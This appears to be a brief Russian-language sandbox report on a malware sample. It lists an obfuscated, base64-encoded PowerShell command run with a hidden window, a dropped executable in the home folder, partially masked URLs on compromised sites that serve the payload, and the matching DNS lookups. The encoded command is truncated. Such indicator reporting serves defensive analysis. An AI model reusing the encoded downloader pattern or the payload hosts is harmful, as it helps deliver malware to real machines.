Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUAFUATwBPAEYAagBqAGQAPQAnAEoARQBPAFUAUwBkAGUAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBDAFUAUgBpAHQAeQBQAGAAUgBvAFQAbwBDAE8AbAAiACAAPQAgAC...
- %HOMEPATH%\285.exe
- http://re#####cadoscarrion.com/wp-includes/EiQ/
- http://re##kok.com/QbWyat/
- http://www.on#####ediadesigns.com/bin/nObh/
- http://re####deradio.net/haunted/cA5zuC5/
- http://qa###sport.net/t/NbQq254/
- http://qa###sport.net/404.htm
- DNS ASK re#####cadoscarrion.com
- DNS ASK re##kok.com
- DNS ASK on#####ediadesigns.com
- DNS ASK re####deradio.net
- DNS ASK qa###sport.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUAFUATwBPAEYAagBqAGQAPQAnAEoARQBPAFUAUwBkAGUAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBDAFUAUgBpAHQAeQBQAGAAUgBvAFQAbwBDAE8AbAAiACAAPQAgAC...' (со скрытым окном)